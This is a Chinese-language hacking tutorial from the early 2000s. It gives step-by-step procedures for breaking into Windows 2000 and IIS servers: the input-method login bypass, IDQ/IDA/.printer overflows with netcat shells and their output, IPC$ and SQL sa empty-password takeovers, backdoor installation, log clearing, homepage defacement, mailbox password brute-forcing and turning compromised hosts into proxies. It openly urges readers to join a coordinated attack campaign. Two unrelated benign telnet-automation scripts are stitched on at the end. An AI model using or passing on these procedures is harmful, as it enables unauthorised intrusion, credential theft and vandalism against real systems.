先用埠掃描器掃描開放3389的機器,然後用終端客戶端程序進行連接,用CTRL+SHIFT快速切換輸入法,切換至全拼,這時在登錄界面左下角將出現輸入法狀態條,在輸入法狀態條上按滑鼠右鍵。選擇「幫助」 —— 「輸入法指南」 —— 「選項」。(如果發現「幫助」呈灰色,放棄,因為對方很可能發現並已經補上了這個漏洞。)按右鍵,選擇「跳轉到URL」,輸入:c:\winnt\system32在該目錄下找到「net.exe」,為「net.exe」創建一個快捷方式,右鍵點擊該快捷方式,在「屬性」 —「目標」—c:\winnt\system32\net.exe 後面空一格,填入「user guest /active :yes」。 點擊「確定」(目的是,利用「net.exe」激活被禁止使用的guest賬戶)運行該快捷方式。(此時你不會看到運行狀態,但guest用戶已被激活。)然後重復操作上面的,在 「屬性」 —— 「目標」—— c:\winnt\system32\net.exe 後面空一格,填入localgroup administrators guest /add(這一步驟目的是,利用「net.exe」將guest變成系統管理員。)再次登錄終端伺服器,以「guest」身份進入,此時guest已是系統管理員,已具備一切可執行權及一切操作許可權。現在,我們可以像操作本地主機一樣,控制對方系統。
(3) idq溢出漏洞
要用到3個程序,一個Snake IIS IDQ 溢出程序GUI版本,一個掃描器,還有NC。
首先掃描一台有IDQ漏洞的機器,然後設置Snake IIS IDQ 溢出程序,在被攻擊IP地址後面寫上對方的IP.埠號一般不需要改動,軟體的默認綁定CMD.EXE的埠是813.不改了.用默認的,左面選擇操作系統類型,隨便選一個,我們選IIS5 English Win2k Sp0吧,點擊IDQ溢出~~OK~~出現發送Shellcode成功的提示了,然後我們用NC來連接。
進入MS-DOS。進入「nc」的目錄。然後:nc --v IP 813
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK
c:\>
看來沒成功. 別灰心,在來一次,換用IIS5 English Win2k Sp1試試。
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
哈哈,終於上來啦,你現在可是system許可權,下面該怎麼做就看你的啦。
(4)IDA溢出漏洞
所用程序:idahack
進入MS-DOS方式(假設idq.exe在c:\下)
c:\idahack.exe
運行參數:c:\idahack <host> <hostport> <hosttype> <shellport>
chinese win2k : 1
chinese win2ksp1: 2
chinese win2ksp2: 3
english win2k : 4
english win2ksp1: 5
english win2ksp2: 6
japanese win2k : 7
japanese win2ksp1: 8
japanese win2ksp2: 9
korea win2k : 10
korea win2ksp1: 11
korea win2ksp2: 12
chinese nt sp5 : 13
chinese nt sp6 : 14
c:\idahack 127.0.0.1 80 1 80
connecting...
sending...
Now you can telnet to 80 port
好 luck
好,現在你可以telnet它的80埠了,我們用NC來連接。
C:\nc 127.0.0.1 80
Microsoft Windows 2000 [Version 5.00.2195]
(C)版權所有 1985-1998 Microsoft Corp
C:\WINNT\system32>
OK,現在我們現在上來了,也可IDQ一樣是SYSTEN許可權,盡情的玩吧。
(5).printer漏洞
這個漏洞,我們用兩個程序來入侵。iis5hack和nc。
C:\>iis5hack
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
usage: D:\IIS5HACK.EXE <Host> <HostPort> <HostType> <ShellPort>
用法: D:\IIS5HACK <溢出的主機> <主機的埠> <主機的類型> <溢出的埠>
chinese edition: 0
chinese edition, sp1: 1
english edition: 2
english edition, sp1: 3
japanese edition: 4
japanese edition, sp1: 5
korea edition: 6
korea edition, sp1: 7
mexico edition: 8
mexico edition, sp1: 9
c:\>iis5hack 127.0.0.19 80 1 119
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
Listn: 80
connecting...
sending...
Now you can telnet to 3739 port
好 luck
溢出成功!
c:\>nc 127.0.0.19 119
http://www.sunx.org
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>
OK,我們又成功取得system許可權!玩吧。
(6)139埠入侵
我們先確定一台存在139埠漏洞的主機。用掃描工具掃描!比如SUPERSCAN這個埠掃描工具。假設現在我們已經得到一台存在139埠漏洞的主機,我們要使用nbtstat -a IP這個命令得到用戶的情況!現在我們要做的是與對方計算機進行共享資源的連接。
用到兩個NET命令,下面就是這兩個命令的使用方法
NET VIEW?
作 用:顯示域列表、計算機列表或指定計算機的共享資源列表。?
命令格式:net view [\\computername | /domain[:domainname]]?
參數介紹:?
<1>鍵入不帶參數的net view顯示當前域的計算機列表。?
<2>\\computername 指定要查看其共享資源的計算機。?
<3>/domain[:domainname]指定要查看其可用計算機的域?
NET USE?
作用:連接計算機或斷開計算機與共享資源的連接,或顯示計算機的連接信息。?
命令格式:net use [devicename | *] [\\computername\sharename[\volume]]?
[password | *]] [/user:[domainname\]username] [[/delete] |?
[/persistent:{yes | no}]]?
參數介紹:?
鍵入不帶參數的net use列出網路連接。?
devicename指定要連接到的資源名稱或要斷開的設備名稱。?
\\computername\sharename伺服器及共享資源的名稱。?
password訪問共享資源的密碼。?
*提示鍵入密碼。 /user指定進行連接的另外一個用戶。?
domainname指定另一個域。?
username指定登錄的用戶名。?
/home將用戶連接到其宿主目錄?
/delete取消指定網路連接。?
/persistent控制永久網路連接的使用。?
C:\net use \\IP
C:\net view \\IP
我們已經看到對方共享了他的C,D,E三個盤
我們要做的是使用NBTSTAT命令載入NBT快取.
c:\>nbtstat –R 載入NBT快取
c:\>nbtstat –c 看有無載入NBT快取
現在我們已經得到的139埠漏洞的主機IP地址和用戶名,現在就該是我們進入他計算的時候了,點擊開始---查找--計算機,將剛才找到的主機名字輸入到上面,選擇查找,就可以找到這台電腦了!雙擊就可以進入,其使用的方法和網上領居的一樣。
(7)IPC入侵
所有程序:流光
開始:在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項,或者直接按Ctrl+R。輸入我們要破解的IP段,我們把「將FrontPage主機自動加入HTTP主機列表取消了」。因為我們只想獲得IPC弱口令,這樣可以加快掃描的速度 :)填入IP,選擇掃描NT/98主機。在「輔助主機」那裡的「IPC$主機」前面打勾,然後在菜單了選「探測」,,掃描出結果以後,「IPC$主機」,選中後按「CTRL+F9」就開始探測IPC用戶列表。會出現「IPC自動探測」
的窗體,把那兩個選項都選了,然後點「選項」 為了加快弱口令掃描速度,這里的兩個選項我們可以全部取消記住。然後點「確定」出來後點「是」就開始探測了。一會兒,結果出來了。比如我們探測出了用戶名為「admin」的管理員,密碼為「admin」,現在我們用命令提示符,熟悉下命令吧,輸入:
net use file://對方ip/ipc$ "密碼" /user:"用戶名" || 建立遠程連接
icmd.exe file://對方ip/admin$ || admin$是對方的winnt目錄
net time file://對方IP/ || 看看對方的本地時間
at file://對方ip/ 啟動程序的時間 啟動程序名 啟動程序的參數 || 用at命令來定時啟動程序
telnet 對方ip 埠
我們也可以改網頁:
net use \\ip\ipc$ "admin" /uesr:"admin" 回車。
出現「命令成功完成」。
然後輸入「dir \\ip\c$\*.*」
看到C:下所有內容。現在我們來改主頁。一般主頁放在c:\inetpub\wwwroot裡面
輸入「dir \\ip\c$\inetpub\wwwroot\*.*」。就可以看到index.htm或index.asp或default.htm或 default.asp.這些就是主頁了,假如你黑頁在C:下,就輸入" 主頁文件 \\ip\c$\inetpub\wwwroot"覆蓋原文件這樣就行了,簡單吧?
日誌清除,斷開連接 :
我們 cl.exe ,clear.exe 上去,再執行,就可以清除日誌,比如clear all :清除所有的日誌。然後在斷開連接:net use file://ip/ipc$ /delete
(8)超管SA空密碼漏洞
使用的工具:流光IV
啟動流光,按Ctrl+R。出現掃描設置對話框,設置掃描IP段,並且選擇掃描的類型為SQL。點擊「確定」,進行掃描,假設我們取得主機:127.0.0.1,然後點擊「工具」 —— SQL遠程命令(或者Ctrl+Q),填入主機IP(127.0.0.1)、用戶(sa)、密碼(空)點擊「連接」,出現遠程命令行的界面。
net user heiying heiying1 /add 填加一個heiying的帳號和密碼heiying1
net localgroup administrators heiying /add 將我們創建的heiying帳號填加到管理組。
下面我們來做跳板:
打開cmd.exe,輸入net use \\127.0.0.1\ipc$ "heiying1" /user:"heiying"命令
顯示命令成功完成。
上傳srv.exe:
srv.exe \\127.0.0.1\admin$\system32
上傳ntlm.exe:
ntlm.exe \\127.0.0.1\admin$\system32
啟動服務:
首先用net time \\127.0.0.1
看看對方主機的時間,(假如回顯\\127.0.0.1 的本地時間是上午12.00),然後我們用at \\2127.0.0.1 12.01 srv.exe命令來啟動srv.exe。等一分鍾後就可以telnet了。
一分鍾後在本機命令提示符中輸入:
telnet X.X.X.X 99
然後我們要啟動NTLM.exe:
在telnet狀態下直接輸入ntlm回車。
顯示:windows 2000 telnet mp,by assassin,all rights reserved.done!
然後從新啟動對方主機的telnet服務:net stop telnet(先關閉telnet服務)再輸入net start telnet(啟動telnet服務)然後我們退出telnet,然後在命令行下輸入telnet 127.0.0.1,依照提示,接著輸入用戶名:heiying,密碼:heiying1,回車。這樣,我們的跳板就做好了,簡單吧?
(上面上傳的srv和ntlm等東東還有一個簡便方法,全都可以直接用流光工具菜單里的種植者上傳,60秒後自動運行,不用敲命令!呵呵~~~~方便吧!)
(9)如何用流光破解信箱密碼
這次的目標是21CN,運行流光IV,選擇POP3主機----右鍵----編輯----添加,填上:pop.21cn.com,其他的就用默認吧!不用更改,確定就行了。到下一步,還是右鍵-----從列表中添加------選擇一個字典,沒有的到網上下載一個字典,或者到黑白網路去下載,我們用簡單模式探測!這樣速度比較快,然後就等著成果吧,上次我以下就破了5個郵箱出來。
(10)frontpage進行攻擊
打開您自己的Frontpage,文件菜單下選擇「打開站點」,然後在文件夾框里寫入http://127.0.0.1(http://不要漏掉)。按下「打開」按鈕,一會後,出現了文件夾,成功了,現在就可以操作網頁文件了。如果跳出錯誤信息,表示有密碼,我們用以下http://127.0.0.1/_vti_pvt/service.pwd,這是默認的密碼文件,下載下來,找個解密器破密碼吧!破出來後就還可以改網頁。這個只能改該網頁,沒什麼玩的。
(11)用肉雞做SOCK5代理跳板
需要軟體:srv.exe,ntlm.exe,snakeSksockserver.exe,SocksCap.exe。
首先我們在命令提示符下建立IPC$管道:
net use \\127.0.0.1\ipc$ "密碼" /user:帳號
通道建立好後,我們把srv.exe sss.exe ntlm.exe全部上傳。
c:\ srv.exe \\10.10.10.10\admin$
1 files copied!
c:\ ntlm.exe \\10.10.10.10\admin$
1 files copied!
c:\ sss.exe \\10.10.10.10\admin$
1 files copied!
復制完畢後,
看肉雞上現在的時間:
c:\net time \\127.0.0.1
顯示當前時間是 2002/4/13 晚上 09:00
我們來啟動srv.exe
c:\at \\127.0.0.1 09:01 srv.exe
等到09:01後。我們來連接肉雞:
c:\telnet 127.0.0.1 99
連上後顯示:
c:\winnt\system32>
接著我們啟動NTLM.exe
c:\winnt\system32>ntlm
顯示:
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:\WINNT\system32>
首先我們終止srv.exe的telnet服務:
C:\WINNT\system32>net stop telnet
繼續:
C:\WINNT\system32>net start telnet
再啟動TELNET。
OK,我們來登陸
c:>telnet 127.0.0.1
*==========================================================
Microsoft Telnet
*==========================================================
c:>
好了,一切順利,我們現在正式開始做代理:
c:>sss.exe -install <---------開始安裝
顯示:
c:>sksockserver installed!
來看看配置:
c:>sss -config show
顯示:
SkServer Port = 1813 <----開放服務的埠 ,我們記著這個1813埠哦
SkServer StartType: 3 - Manual <---服務啟動方式
SkServer Enable Client Set Num:0 <---客戶端的項目個數
SkServer Pass SkServer Number:0 <---經過SkServer的項目個數
來啟動服務:
c:>net start skserver
提示你正在啟動,並且完成。
來檢查一下是不是啟動了:
c:>net start <-----------看看啟動的服務列表
These Windows 2000 services are started:
Print Spooler
Server
Snake SockProxy Service <---------------就是它,呵呵!
System Event Notification
TCP/IP NetBIOS Helper Service
Telephony
Telnet
The command completed successfully.
c:>_
好了,到這里我們已經做好了一個socks5代理了,我們自己的哦.OK,下面我們用sockscap來使用我們做代理。
安裝好SocksCap後,我們在桌面上打開SocksCap V2,點開File選項選Settings...彈出卡片,在 SOCKS Server裡面我們填肉雞的IP:127.0.0.1,PortT填默認的1813埠,下面的我們選socks version 5,呵呵,和 Attempt local then remot,這是域名解析的順序,先本地,然後才遠程。設置完了點「確定」我們就可以使用了,添加應用程序到sockscap裡面,點開那個"new"按鈕,會彈出一個卡片,
Profile name :程序名,隨便寫。
Command Line: 命令行,點後面的Browse...找到你的程序路徑
Working:填好上面那個,這個就自動加上.
這樣我們就把程序加到SocksCap裡面了。
現在們可以雙擊裡面的程序來使用,也可以選住程序在點"Run"來運行。
好了,終於寫完了,上面的內容都很簡單,很適合初學者,還望高手們不好見笑,剛好聽說這次5.1有很多聯盟有所行動,希望上面的內容能教會一部分人,少走彎路,讓更多的人參與這次行動。UNIX和LINUX由於自己的功力也還不夠,還差很遠,所以還不敢寫。
I. 求一個腳本:自動telnet多個設備(192.168.1.1-10),執行show run命令,並將返回的信息輸出到指定文件
簡單寫一個,根據自己情況改吧
#!/bin/bash
for i in `seq 1 10`
do
echo "=============IP: 192.168.1.$i=============="
(sleep 3;echo admin;sleep 3;echo admin;sleep 3;echo "terminal length 0";sleep 3;echo "show run";sleep 3;exit;)|telnet 192.168.1.$i >> result.`date +%Y%m%d.log 2>&1
echo "==========================================="
done
J. 如何用shell腳本實現自動telnet
很多人認為telnet象passwd和su一樣,無法通過管道和輸入轉向使其自動工作,但實際上telnet是支持輸入轉向的.雖然,嚴格的說,shell腳本無法使telnet進入交互狀態,但它確實可你使你進入遠程系統並運行你希望的命令後退出.這遠比用rsh(remsh,rcmd)更令人放心,
使用如下的腳本可以達到你的要求:
(sleep 1;echo user;sleep 1; echo passwd;echo yourcmd ;sleep 1)|telnet remotehost
其中user,passwd,yourcmd,remotehost分別更換成你的用戶名,用戶口令,你想要運行的命令,遠程機器名或IP便可以了. 如果要想使用腳本進入交互狀態,可以使用expect.
如果你要通過telnet某個IP的埠來得到部分數據,則可以用以下命令
(sleep 5;) | telnet IP PORT 這樣就可以在telnet後將PORT在5秒內輸出的數據列印到屏幕上,然後自動退出
EG:
tempValue="KEY"
str4=`(sleep 1;echo AA;sleep 1; echo 123; sleep 1; echo tail -f /aa/log/a.log;sleep 1) | telnet ${IP} | grep ${tempValue}`
num4=`echo ${#str4}`
if [ ${num4} -eq 0 ];then
echo "==::在a.log文件中沒有找到關鍵字KEY,請檢查!"
sheet4="@NULL"
else
echo "==::在a.log文件有找到關鍵字KEY!"
sheet4="@OK"
fi